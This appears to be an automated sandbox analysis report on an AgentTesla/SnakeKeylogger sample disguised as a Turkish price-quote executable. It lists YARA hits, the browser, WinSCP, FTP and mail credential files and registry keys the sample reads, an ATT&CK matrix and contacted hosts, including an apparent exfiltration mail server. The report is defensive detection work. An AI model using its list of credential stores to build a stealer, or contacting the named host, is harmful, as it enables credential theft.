Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Queries volume information: C:\Users\user\AppData\Roaming\cYDnGbgU.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Queries volume information: C:\Users\user\AppData\Roaming\cYDnGbgU.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 8.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.cYDnGbgU.exe.4292550.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.cYDnGbgU.exe.42cdd70.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.39bcdb8.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.cYDnGbgU.exe.42cdd70.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.cYDnGbgU.exe.4292550.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.39bcdb8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.4149137493.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4148813369.00000000028AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4149137493.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4149137493.000000000339E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4148813369.0000000002884000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1756426531.00000000042A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4148813369.00000000028C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1796054239.0000000004292000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4149137493.0000000003375000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4148813369.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1756426531.0000000003981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: F#U0130YAT TEKL#U0130F#U0130-2400.exe PID: 6596, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: F#U0130YAT TEKL#U0130F#U0130-2400.exe PID: 7048, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cYDnGbgU.exe PID: 2836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cYDnGbgU.exe PID: 7444, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 9.2.cYDnGbgU.exe.4292550.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.cYDnGbgU.exe.42cdd70.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.39bcdb8.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.cYDnGbgU.exe.42cdd70.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.cYDnGbgU.exe.4292550.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.39bcdb8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4148813369.0000000002884000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1756426531.00000000042A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1796054239.0000000004292000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4149137493.0000000003375000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1756426531.0000000003981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: F#U0130YAT TEKL#U0130F#U0130-2400.exe PID: 6596, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: F#U0130YAT TEKL#U0130F#U0130-2400.exe PID: 7048, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cYDnGbgU.exe PID: 2836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cYDnGbgU.exe PID: 7444, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 8.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.cYDnGbgU.exe.4292550.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.cYDnGbgU.exe.42cdd70.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.39bcdb8.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.cYDnGbgU.exe.42cdd70.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.cYDnGbgU.exe.4292550.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.39bcdb8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.4149137493.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4148813369.00000000028AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4149137493.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4149137493.000000000339E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4148813369.0000000002884000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1756426531.00000000042A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4148813369.00000000028C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1796054239.0000000004292000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4149137493.0000000003375000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4148813369.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1756426531.0000000003981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: F#U0130YAT TEKL#U0130F#U0130-2400.exe PID: 6596, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: F#U0130YAT TEKL#U0130F#U0130-2400.exe PID: 7048, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cYDnGbgU.exe PID: 2836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cYDnGbgU.exe PID: 7444, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	231 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	21 Input Capture	34 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	2 Obfuscated Files or Information	1 Credentials in Registry	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	631 Security Software Discovery	Distributed Component Object Model	21 Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	1 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	261 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	261 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
F#U0130YAT TEKL#U0130F#U0130-2400.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.SnakeKeylogger
F#U0130YAT TEKL#U0130F#U0130-2400.exe	79%	Virustotal		Browse
F#U0130YAT TEKL#U0130F#U0130-2400.exe	100%	Avira	HEUR/AGEN.1308740
F#U0130YAT TEKL#U0130F#U0130-2400.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\cYDnGbgU.exe	100%	Avira	HEUR/AGEN.1308740
C:\Users\user\AppData\Roaming\cYDnGbgU.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\cYDnGbgU.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.SnakeKeylogger
C:\Users\user\AppData\Roaming\cYDnGbgU.exe	79%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
api.ipify.org	0%	Virustotal	Browse
ip-api.com	0%	Virustotal	Browse
mail.usgrovemall.com	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.fontbureau.com	0%	URL Reputation	safe
http://www.fontbureau.com/designersG	0%	URL Reputation	safe
http://www.fontbureau.com/designers/?	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
https://account.dyn.com/	0%	URL Reputation	safe
http://www.fontbureau.com/designers?	0%	URL Reputation	safe
https://api.ipify.org/	0%	Avira URL Cloud	safe
http://mail.usgrovemall.com	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.fontbureau.com/designers	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.fontbureau.com/designers/cabarga.htmlN	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fontbureau.com/designers/frere-user.html	0%	URL Reputation	safe
http://r11.o.lencr.org0#	0%	Avira URL Cloud	safe
http://r11.i.lencr.org/0	0%	Avira URL Cloud	safe
https://api.ipify.org/t	0%	Avira URL Cloud	safe
https://api.ipify.org/	0%	Virustotal		Browse
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0	0%	Virustotal		Browse
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.fontbureau.com/designers8	0%	URL Reputation	safe
http://www.fonts.com	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
https://api.ipify.org	0%	Avira URL Cloud	safe
http://mail.usgrovemall.com	1%	Virustotal		Browse
http://x1.c.lencr.org/0	0%	Avira URL Cloud	safe
http://x1.i.lencr.org/0	0%	Avira URL Cloud	safe
http://ip-api.com	0%	Avira URL Cloud	safe
http://x1.i.lencr.org/0	0%	Virustotal		Browse
https://api.ipify.org	0%	Virustotal		Browse
http://r11.i.lencr.org/0	0%	Virustotal		Browse
https://api.ipify.org/t	0%	Virustotal		Browse
http://ip-api.com/line/?fields=hosting	0%	Avira URL Cloud	safe
http://x1.c.lencr.org/0	0%	Virustotal		Browse
http://ip-api.com/line/?fields=hosting	1%	Virustotal		Browse
http://ip-api.com	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	172.67.74.152	true	false	0%, Virustotal, Browse	unknown
ip-api.com	208.95.112.1	true	true	0%, Virustotal, Browse	unknown
mail.usgrovemall.com	192.250.227.28	true	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ip-api.com/line/?fields=hosting	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://mail.usgrovemall.com	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4148813369.00000000028AE000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4149137493.000000000339E000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fontbureau.com	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designersG	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/?	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://account.dyn.com/	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1756426531.00000000042A6000.00000004.00000800.00020000.00000000.sdmp, F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1756426531.0000000003981000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 00000009.00000002.1796054239.0000000004292000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4145299206.0000000000435000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://r11.o.lencr.org0#	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4148813369.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4146072478.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4149137493.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4146200410.000000000148A000.00000004.00000020.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4160825037.0000000006D16000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.tiro.com	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.goodfont.co.kr	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.org/t	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4148813369.0000000002821000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4149137493.0000000003311000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://r11.i.lencr.org/0	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4148813369.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4146072478.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4149137493.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4146200410.000000000148A000.00000004.00000020.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4160825037.0000000006D16000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.org	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1756426531.00000000042A6000.00000004.00000800.00020000.00000000.sdmp, F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1756426531.0000000003981000.00000004.00000800.00020000.00000000.sdmp, F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4148813369.0000000002821000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 00000009.00000002.1796054239.0000000004292000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4149137493.0000000003311000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4145299206.0000000000435000.00000040.00000400.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
